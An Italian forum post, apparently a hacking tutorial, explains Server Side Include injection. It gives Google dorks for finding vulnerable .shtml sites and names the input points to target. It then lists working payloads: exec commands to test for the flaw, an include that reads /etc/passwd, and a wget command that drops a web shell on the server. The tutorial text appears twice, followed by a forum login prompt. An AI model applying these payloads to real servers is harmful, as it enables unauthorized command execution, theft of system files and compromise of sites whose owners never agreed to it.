Un attacco di tipo SSI (Server Side Include) esegue comandi direttamente sul server del sito, ovviamente per farlo dovete avere almeno una conoscenza base del Batch (per un server windows) oppure del Bash (in ambiente Linux).
Per essere vulnerabile a questo tipo di attacco, il sito deve avere come estensione .shtml / shtm o stm su apache, oppure deve avere incluso nel file di config di apache un Server Side Includes, ecco delle doork per la ricerca da google:
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Ora andiamo a verificarlo, dobbiamo inviare un comando in uno di questi spazi:
Caselle di testo o di ricerca
Cookies
Intestazioni
Barra degli indirizzi
I comandi sono i seguenti:
< !–#exec cmd=”ls” –>
< !–#exec cmd=”dir” –>
Il primo serve in ambiente Linux, e il secondo in Windows.
Se dopo aver fatto questa prova, come Output otteniamo un file di sistema, vuol dire che il server è vulnerabile, ora vi faccio qualche esempio di codice da effettura:
Leggiamo il file /etc/passwd:
<!–#include virtual=”/etc/passwd” –>
Scarica una shell nel server:
< !–#exec cmd=”wget “shell_3.php”" –>
FONTE:
Per essere vulnerabile a questo tipo di attacco, il sito deve avere come estensione .shtml / shtm o stm su apache, oppure deve avere incluso nel file di config di apache un Server Side Includes, ecco delle doork per la ricerca da google:
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Ora andiamo a verificarlo, dobbiamo inviare un comando in uno di questi spazi:
Caselle di testo o di ricerca
Cookies
Intestazioni
Barra degli indirizzi
I comandi sono i seguenti:
< !–#exec cmd=”ls” –>
< !–#exec cmd=”dir” –>
Il primo serve in ambiente Linux, e il secondo in Windows.
Se dopo aver fatto questa prova, come Output otteniamo un file di sistema, vuol dire che il server è vulnerabile, ora vi faccio qualche esempio di codice da effettura:
Leggiamo il file /etc/passwd:
<!–#include virtual=”/etc/passwd” –>
Scarica una shell nel server:
< !–#exec cmd=”wget “shell_3.php”" –>
FONTE:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Ultima modifica: